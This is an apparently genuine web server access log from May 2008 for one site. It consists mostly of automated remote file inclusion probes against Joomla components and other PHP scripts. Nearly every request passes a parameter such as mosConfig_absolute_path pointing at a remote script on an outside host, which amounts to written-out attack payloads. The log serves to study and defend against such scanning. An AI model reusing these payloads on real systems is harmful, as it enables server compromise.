193.178.228.12 - - [16/May/2008:10:26:43 -0700] "GET /samplefaqsupport.php?path[docroot]=http://www.hotghettomess.com/picture_library/pictures/com_pixel/r0x.id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.178.228.12 - - [16/May/2008:10:26:50 -0700] "GET /logs/class.dashboard_cms.php?where_framework=http://www.hotghettomess.com/picture_library/pictures/com_pixel/r0x.id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.178.228.12 - - [16/May/2008:10:26:50 -0700] "GET /class.dashboard_cms.php?where_framework=http://www.hotghettomess.com/picture_library/pictures/com_pixel/r0x.id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.71.36.82 - - [16/May/2008:10:27:24 -0700] "GET /logs/file.php?/?mosConfig_absolute_path=http://www.dito.nl/php_content/.htaccess_/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
80.71.36.82 - - [16/May/2008:10:27:24 -0700] "GET /file.php?/?mosConfig_absolute_path=http://www.dito.nl/php_content/.htaccess_/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
202.142.220.82 - - [16/May/2008:10:27:29 -0700] "GET /logs/access_080111.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.142.220.82 - - [16/May/2008:10:27:30 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.142.220.82 - - [16/May/2008:10:27:31 -0700] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.173.48.114 - - [16/May/2008:10:27:34 -0700] "GET /logs//administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://h1.ripway.com/hostings/idKORN.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.173.48.114 - - [16/May/2008:10:27:35 -0700] "GET //administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://h1.ripway.com/hostings/idKORN.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
204.3.218.69 - - [16/May/2008:10:27:36 -0700] "GET /logs/access_080215.log//login.php?dir=http://www.erasethedark.com/dlk/sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
204.3.218.69 - - [16/May/2008:10:27:36 -0700] "GET //login.php?dir=http://www.erasethedark.com/dlk/sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
204.3.218.69 - - [16/May/2008:10:27:36 -0700] "GET /logs//login.php?dir=http://www.erasethedark.com/dlk/sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
219.94.129.31 - - [16/May/2008:10:27:44 -0700] "GET /logs/access.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://geocities.com/carneline0817/kontol/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
219.94.129.31 - - [16/May/2008:10:27:44 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://geocities.com/carneline0817/kontol/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
219.94.129.31 - - [16/May/2008:10:27:44 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://geocities.com/carneline0817/kontol/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
219.94.129.31 - - [16/May/2008:10:27:56 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://geocities.com/carneline0817/kontol/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.94.56.97 - - [16/May/2008:10:28:01 -0700] "GET /logs/access_080308.log/class.dashboard_cms.php?where_framework=http://www.hotghettomess.com/picture_library/pictures/com_pixel/r0x.id.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
69.94.56.97 - - [16/May/2008:10:28:01 -0700] "GET /class.dashboard_cms.php?where_framework=http://www.hotghettomess.com/picture_library/pictures/com_pixel/r0x.id.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
69.94.56.97 - - [16/May/2008:10:28:01 -0700] "GET /logs/class.dashboard_cms.php?where_framework=http://www.hotghettomess.com/picture_library/pictures/com_pixel/r0x.id.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
62.21.96.16 - - [16/May/2008:10:28:04 -0700] "GET /logs/access_080308.log/class.dashboard_cms.php?where_framework=http://www.hotghettomess.com/picture_library/pictures/com_pixel/r0x.id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.21.96.16 - - [16/May/2008:10:28:04 -0700] "GET /class.dashboard_cms.php?where_framework=http://www.hotghettomess.com/picture_library/pictures/com_pixel/r0x.id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.21.96.16 - - [16/May/2008:10:28:05 -0700] "GET /logs/class.dashboard_cms.php?where_framework=http://www.hotghettomess.com/picture_library/pictures/com_pixel/r0x.id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.216.249.194 - - [16/May/2008:10:28:24 -0700] "GET /logs/access_080313.log//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.e-sportv.com/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.67.26.84 - - [16/May/2008:10:28:31 -0700] "GET /logs/access_080225.log/index.php?pagina1=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.67.26.84 - - [16/May/2008:10:28:32 -0700] "GET /logs/access_080225.log/index.php?pagina1=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
204.3.218.69 - - [16/May/2008:10:28:34 -0700] "GET /logs/access_080322.log//mcf.php?content=http://www.erasethedark.com/dlk/sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
217.67.26.84 - - [16/May/2008:10:28:36 -0700] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.67.26.84 - - [16/May/2008:10:28:37 -0700] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.67.26.84 - - [16/May/2008:10:28:37 -0700] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.67.26.84 - - [16/May/2008:10:28:38 -0700] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
122.220.195.21 - - [16/May/2008:10:28:39 -0700] "GET /logs/access_080126.log//modules/My_eGallery/public/displayCategory.php?basepath=http://www.e-sportv.com/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
122.220.195.21 - - [16/May/2008:10:28:39 -0700] "GET //modules/My_eGallery/public/displayCategory.php?basepath=http://www.e-sportv.com/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.126.239.14 - - [16/May/2008:10:28:39 -0700] "GET /logs/access_080215.log//?p=http://www.feuerwehr-herrsching.de/test/components/com_galleria/upload/rfi?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
122.220.195.21 - - [16/May/2008:10:28:39 -0700] "GET /logs//modules/My_eGallery/public/displayCategory.php?basepath=http://www.e-sportv.com/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.126.239.14 - - [16/May/2008:10:28:45 -0700] "GET /logs//?p=http://www.feuerwehr-herrsching.de/test/components/com_galleria/upload/rfi?? HTTP/1.1" 200 47704 "-" "libwww-perl/5.803" "www.dmulk.com"
217.16.26.124 - - [16/May/2008:10:28:46 -0700] "GET /logs/access_080308.log/class.dashboard_cms.php?where_framework=http://www.hotghettomess.com/picture_library/pictures/com_pixel/r0x.id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
217.16.26.124 - - [16/May/2008:10:28:47 -0700] "GET /class.dashboard_cms.php?where_framework=http://www.hotghettomess.com/picture_library/pictures/com_pixel/r0x.id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
217.16.26.124 - - [16/May/2008:10:28:47 -0700] "GET /logs/class.dashboard_cms.php?where_framework=http://www.hotghettomess.com/picture_library/pictures/com_pixel/r0x.id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
194.126.239.14 - - [16/May/2008:10:28:48 -0700] "GET //?p=http://www.feuerwehr-herrsching.de/test/components/com_galleria/upload/rfi?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.803" "www.dmulk.com"
122.220.195.21 - - [16/May/2008:10:28:58 -0700] "GET /logs/access_080121.log//modules/My_eGallery/public/displayCategory.php?basepath=http://www.e-sportv.com/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.178.228.12 - - [16/May/2008:10:29:06 -0700] "GET /logs/access_080308.log/class.dashboard_cms.php?where_framework=http://www.hotghettomess.com/picture_library/pictures/com_pixel/r0x.id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.178.228.12 - - [16/May/2008:10:29:06 -0700] "GET /class.dashboard_cms.php?where_framework=http://www.hotghettomess.com/picture_library/pictures/com_pixel/r0x.id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.178.228.12 - - [16/May/2008:10:29:07 -0700] "GET /logs/class.dashboard_cms.php?where_framework=http://www.hotghettomess.com/picture_library/pictures/com_pixel/r0x.id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.21.96.16 - - [16/May/2008:10:29:15 -0700] "GET /logs/access_080313.log/class.dashboard_cms.php?where_framework=http://www.hotghettomess.com/picture_library/pictures/com_pixel/r0x.id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.142.220.82 - - [16/May/2008:10:29:25 -0700] "GET /logs/access_080127.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.94.56.97 - - [16/May/2008:10:29:45 -0700] "GET /logs/access_080313.log/class.dashboard_cms.php?where_framework=http://www.hotghettomess.com/picture_library/pictures/com_pixel/r0x.id.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
217.16.26.124 - - [16/May/2008:10:30:17 -0700] "GET /logs/access_080313.log/class.dashboard_cms.php?where_framework=http://www.hotghettomess.com/picture_library/pictures/com_pixel/r0x.id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
194.177.96.168 - - [16/May/2008:10:30:18 -0700] "GET /logs/access_080312.log//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.peccu.org/components/com_extcalendar/upload/index.php/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
122.220.195.21 - - [16/May/2008:10:30:33 -0700] "GET /logs/access_080220.log//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.e-sportv.com/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.70.129.162 - - [16/May/2008:10:30:36 -0700] "GET /logs/access_080308.log/class.dashboard_cms.php?where_framework=http://www.hotghettomess.com/picture_library/pictures/com_pixel/r0x.id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.70.129.162 - - [16/May/2008:10:30:36 -0700] "GET /class.dashboard_cms.php?where_framework=http://www.hotghettomess.com/picture_library/pictures/com_pixel/r0x.id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.70.129.162 - - [16/May/2008:10:30:37 -0700] "GET /logs/class.dashboard_cms.php?where_framework=http://www.hotghettomess.com/picture_library/pictures/com_pixel/r0x.id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.178.228.12 - - [16/May/2008:10:30:41 -0700] "GET /logs/access_080313.log/class.dashboard_cms.php?where_framework=http://www.hotghettomess.com/picture_library/pictures/com_pixel/r0x.id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.70.129.162 - - [16/May/2008:10:30:43 -0700] "GET /logs/access_080313.log/class.dashboard_cms.php?where_framework=http://www.hotghettomess.com/picture_library/pictures/com_pixel/r0x.id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.191.12.23 - - [16/May/2008:10:30:44 -0700] "GET /logs/access.log/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://maniamediapass.com/ct/dat/62800.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
88.191.12.23 - - [16/May/2008:10:30:49 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://maniamediapass.com/ct/dat/62800.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
88.191.12.23 - - [16/May/2008:10:30:53 -0700] "GET /logs/access.log/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://maniamediapass.com/ct/dat/62800.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
88.191.12.23 - - [16/May/2008:10:30:55 -0700] "GET /logs/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://maniamediapass.com/ct/dat/62800.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
88.191.12.23 - - [16/May/2008:10:30:58 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://maniamediapass.com/ct/dat/62800.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
88.191.12.23 - - [16/May/2008:10:30:59 -0700] "GET /logs/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://maniamediapass.com/ct/dat/62800.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
88.191.12.23 - - [16/May/2008:10:31:04 -0700] "GET /logs/access.log/myMailer.class.php?mosConfig_absolute_path=http://maniamediapass.com/ct/dat/62800.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
88.191.12.23 - - [16/May/2008:10:31:04 -0700] "GET /myMailer.class.php?mosConfig_absolute_path=http://maniamediapass.com/ct/dat/62800.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
88.191.12.23 - - [16/May/2008:10:31:05 -0700] "GET /logs/myMailer.class.php?mosConfig_absolute_path=http://maniamediapass.com/ct/dat/62800.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
59.126.46.141 - - [16/May/2008:10:31:07 -0700] "GET //ashnews.php?pathtoashnews=http://jikustik.t35.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
59.126.46.141 - - [16/May/2008:10:31:08 -0700] "GET /logs//ashnews.php?pathtoashnews=http://jikustik.t35.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
122.220.195.21 - - [16/May/2008:10:31:09 -0700] "GET /logs/access_080102.log//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.e-sportv.com/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.114.130.19 - - [16/May/2008:10:31:45 -0700] "GET /logs/index.php?document=http://www.diabeteszones.com/templates/fs-green/css/sex.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
62.210.113.58 - - [16/May/2008:10:31:49 -0700] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
85.114.130.19 - - [16/May/2008:10:31:50 -0700] "GET /index.php?document=http://www.diabeteszones.com/templates/fs-green/css/sex.txt?? HTTP/1.1" 200 11606 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
85.114.130.19 - - [16/May/2008:10:31:53 -0700] "GET /logs/index.php?document=http://www.diabeteszones.com/templates/fs-green/css/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
62.210.113.58 - - [16/May/2008:10:31:58 -0700] "GET //index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.apnic.net/index.html? HTTP/1.0" 200 11590 "-" "Mozilla/5.0" "www.dmulk.com"
209.216.249.194 - - [16/May/2008:10:32:05 -0700] "GET /logs/access_080220.log//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.e-sportv.com/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
148.231.192.131 - - [16/May/2008:10:32:06 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://juartea.biz/image/main/.news/sex.txt?? HTTP/1.0" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.dmulk.com"
148.231.192.131 - - [16/May/2008:10:32:07 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.freewebtown.com/muiema/test.txt?? HTTP/1.0" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.dmulk.com"
148.231.192.131 - - [16/May/2008:10:32:07 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://juartea.biz/image/main/.news/sex.txt?? HTTP/1.0" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.dmulk.com"
148.231.192.131 - - [16/May/2008:10:32:07 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.freewebtown.com/muiema/test.txt?? HTTP/1.0" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.dmulk.com"
85.114.130.19 - - [16/May/2008:10:32:08 -0700] "GET /index.php?document=http://www.diabeteszones.com/templates/fs-green/css/test.txt??? HTTP/1.1" 200 11607 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
122.220.195.21 - - [16/May/2008:10:32:19 -0700] "GET /logs/access_071230.log//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.e-sportv.com/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.16.26.124 - - [16/May/2008:10:32:32 -0700] "GET /logs/samplefaqsupport.php?path[docroot]=http://www.hotghettomess.com/picture_library/pictures/com_pixel/r0x.id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
217.16.26.124 - - [16/May/2008:10:32:33 -0700] "GET /samplefaqsupport.php?path[docroot]=http://www.hotghettomess.com/picture_library/pictures/com_pixel/r0x.id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
62.210.113.58 - - [16/May/2008:10:32:33 -0700] "GET /logs/errors.php?error=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.216.249.194 - - [16/May/2008:10:32:38 -0700] "GET /logs/access_080102.log//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.e-sportv.com/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
204.92.87.157 - - [16/May/2008:10:32:45 -0700] "GET /logs/access_080421.log//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://premier.com.tr/edestek/files/index.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
204.92.87.157 - - [16/May/2008:10:32:45 -0700] "GET //administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://premier.com.tr/edestek/files/index.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
204.92.87.157 - - [16/May/2008:10:32:46 -0700] "GET /logs//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://premier.com.tr/edestek/files/index.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
122.220.195.21 - - [16/May/2008:10:32:53 -0700] "GET /logs/access_071229.log//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.e-sportv.com/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
204.3.218.69 - - [16/May/2008:10:33:11 -0700] "GET /logs/access_080201.log//login.php?dir=http://www.erasethedark.com/dlk/sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
69.94.56.97 - - [16/May/2008:10:33:11 -0700] "GET /logs/access_080308.log/class.dashboard_cms.php?where_framework=http://www.hotghettomess.com/picture_library/pictures/com_pixel/r0x.id.txt????? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
69.94.56.97 - - [16/May/2008:10:33:12 -0700] "GET /class.dashboard_cms.php?where_framework=http://www.hotghettomess.com/picture_library/pictures/com_pixel/r0x.id.txt????? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
69.94.56.97 - - [16/May/2008:10:33:13 -0700] "GET /logs/class.dashboard_cms.php?where_framework=http://www.hotghettomess.com/picture_library/pictures/com_pixel/r0x.id.txt????? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
67.19.51.194 - - [16/May/2008:10:33:18 -0700] "GET /logs/home.php?inc=http://spyxx.iespana.es/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.19.51.194 - - [16/May/2008:10:33:18 -0700] "GET /home.php?inc=http://spyxx.iespana.es/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
138.163.0.42 - - [16/May/2008:10:33:28 -0700] "GET /bikes/dteel/EQ2/Screenshots/EQ2_000295.jpg HTTP/1.0" 200 828304 "http://gotla.guildportal.com/Guild.aspx?GuildID=80731&TabID=695681" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)" "www.dmulk.com"
138.163.0.44 - - [16/May/2008:10:33:29 -0700] "GET /bikes/dteel/EQ2/Screenshots/EQ2_000300.jpg HTTP/1.0" 200 913443 "http://gotla.guildportal.com/Guild.aspx?GuildID=80731&TabID=695681" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)" "www.dmulk.com"
138.163.0.43 - - [16/May/2008:10:33:29 -0700] "GET /bikes/dteel/EQ2/Screenshots/EQ2_000299.jpg HTTP/1.0" 200 927196 "http://gotla.guildportal.com/Guild.aspx?GuildID=80731&TabID=695681" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)" "www.dmulk.com"
138.163.0.42 - - [16/May/2008:10:33:30 -0700] "GET /bikes/dteel/EQ2/Screenshots/EQ2_000281.jpg HTTP/1.0" 200 812848 "http://gotla.guildportal.com/Guild.aspx?GuildID=80731&TabID=695681" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)" "www.dmulk.com"
138.163.0.42 - - [16/May/2008:10:33:30 -0700] "GET /bikes/dteel/EQ2/Screenshots/EQ2_000292.jpg HTTP/1.0" 200 842640 "http://gotla.guildportal.com/Guild.aspx?GuildID=80731&TabID=695681" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)" "www.dmulk.com"
62.21.96.16 - - [16/May/2008:10:33:34 -0700] "GET /logs/samplefaqsupport.php?path[docroot]=http://www.hotghettomess.com/picture_library/pictures/com_pixel/r0x.id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.21.96.16 - - [16/May/2008:10:33:35 -0700] "GET /samplefaqsupport.php?path[docroot]=http://www.hotghettomess.com/picture_library/pictures/com_pixel/r0x.id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.70.129.162 - - [16/May/2008:10:33:36 -0700] "GET /samplefaqsupport.php?path[docroot]=http://www.hotghettomess.com/picture_library/pictures/com_pixel/r0x.id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
217.70.129.162 - - [16/May/2008:10:33:36 -0700] "GET /logs/samplefaqsupport.php?path[docroot]=http://www.hotghettomess.com/picture_library/pictures/com_pixel/r0x.id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
77.48.10.14 - - [16/May/2008:10:33:38 -0700] "GET /logs/index.php?site1=http://www.mas-manos.com.mx/images/banners/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.48.10.14 - - [16/May/2008:10:33:44 -0700] "GET /index.php?site1=http://www.mas-manos.com.mx/images/banners/idnews.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
69.94.56.97 - - [16/May/2008:10:34:06 -0700] "GET /logs/access_080313.log/class.dashboard_cms.php?where_framework=http://www.hotghettomess.com/picture_library/pictures/com_pixel/r0x.id.txt????? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
209.216.249.194 - - [16/May/2008:10:34:13 -0700] "GET /logs/access_071230.log//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.e-sportv.com/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
122.220.195.21 - - [16/May/2008:10:34:15 -0700] "GET /logs/access_080108.log//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.e-sportv.com/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.21.96.16 - - [16/May/2008:10:34:17 -0700] "GET /logs/access_080308.log/class.dashboard_cms.php?where_framework=http://www.hotghettomess.com/picture_library/pictures/com_pixel/r0x.id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.21.96.16 - - [16/May/2008:10:34:17 -0700] "GET /class.dashboard_cms.php?where_framework=http://www.hotghettomess.com/picture_library/pictures/com_pixel/r0x.id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.21.96.16 - - [16/May/2008:10:34:17 -0700] "GET /logs/class.dashboard_cms.php?where_framework=http://www.hotghettomess.com/picture_library/pictures/com_pixel/r0x.id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
122.220.195.21 - - [16/May/2008:10:34:18 -0700] "GET /logs/access_071224.log//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.e-sportv.com/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
